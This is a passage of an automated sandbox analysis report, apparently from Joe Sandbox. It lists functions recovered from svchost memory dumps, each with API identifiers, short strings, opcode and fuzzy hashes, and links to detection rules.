                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: a54e80bb82137fd852d70d2d4b38f9064022f1ae65caaef9bbb60a77a2beb057
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: 1061CB3692DB94C6E761CB55E48435AB7B0F389798F10011AEACE47BA8DB7CC458CF00
                                                              Function 00000179537B4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 1a93a27212db14d107c445d7083ca94b3231e77f583d31af7090b27211639dc1
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 16110632E1CF7821F666156AD4753E513706B7B3BCF080626A97E077D6FB24C8AC5211
                                                              Function 00000179537AAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 3a2af3483e4300a1187523e9586c3a768ce971fdbc56a475376103612aa46848
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: CD613632A19B988AEB619F69D4803DD77B0F74AB8CF144216EE4D17B98DB38C599C700
                                                              Function 00000179537AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 643f0b19000955fd4531acc435b5a4dff8720e58fb8e76c4df4d970b4f056407
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 4F51B072928BA0CAEBB98F25948439D77B0F756B8DF184117DA9D47BD9CB38C468C700
                                                              Function 000001795377A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 8b5f16ec00f45c4a7ced28edb1d3fb9ff7d8c5f0b459b66f842ca35e7ccd5795
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: C2517032908AA0CAFBA68F25954439877F0F39AB98F185117EF5D87BD5CB38D468C700
                                                              Function 00000179537B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 06d4593c12757a61a920345c0e2df76c0e129f7e16386725fafdea6654bba7a9
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: C5D1BF32B19A9489E712CFA9D4503DC3BB1F35AB9CF148216DE5E97B99EB34C50AC340
                                                              Function 00000179537A14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: bb6b78b593707857310a3324dd096787fdb4aa97373bc89aca0eb61e411b0d18
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: 1D118B36918AA8C6E716DF66A81818977B0F78AF89F084026EBCD43716EE38C458C744
                                                              Function 00000179537B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: aa35c425ef9fc4d6b2506b4269cbb304a299e5433bf6d60ac2d50f473d078f8f
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: D191A032F1966485FB629F6594A03EE2BB0B746B8CF14410BDE4E67B95EF35C48AC700
                                                              Function 00000179537A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: 9256c04884558f9edc0885e3b789def796bf32de9d9fbb855d04952720b7616f
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: A6111C32B14B1989EB008B61E8543E833B4F71A75CF440E22DBAD467A4EB78C1A88380
                                                              Function 00000179537A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 9464ef761ac9fd1665e8c61fdda8a34e1658d64a02c8beec298f218a00bbb3c3
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: AB71D736A287A146E766DF25D8443EA67B4F38678DF44002BDE4E53F89DE35C689C700
                                                              Function 0000017953779E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 4c013e113835d3432451d184c3eefa52352108669f7f627b66b82dfff524006d
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 0D615433A19B988AEB229F65D4807DD77B0F34AB8CF044616EE4D17B98DB78D199C700
                                                              Function 00000179537A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 19b6e1f95d14bb4b976e64b46c6a80dd0e96378682549d0fa7c6c0d7907e3b1f
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 1651E732E2C7A181F6769E29A4583EAA7B1F387748F440127DE5D03B59DB39C98CC740
                                                              Function 00000179537B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 0369f9cddf07d3ef424b9edaf2e32a6908f06cc7a4d25baa8926a904c7eb2ec1
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: DE41C432B19A9482EB21DF25E8543E977B0F799798F504026EE4D87794EF3CC449C744
                                                              Function 00000179537A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 6bf90dc9676103b16e0bcc020ce2c1a8f578aef3304401d1f88f1bac78d3cb30
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: C8112B36619B9482EB628B15E44439A77F5F78AB98F584221EFCC07758EF3CC565CB00
                                                              Function 00000179537A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 2a4f8d57dda99efd85754da4b3249eaba21036bec465e402961c7aa9532c5649
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: F0119135A15B6881FA56DB66A4092A973F1FB8AFC8F584026DE8D87765EF38C446C300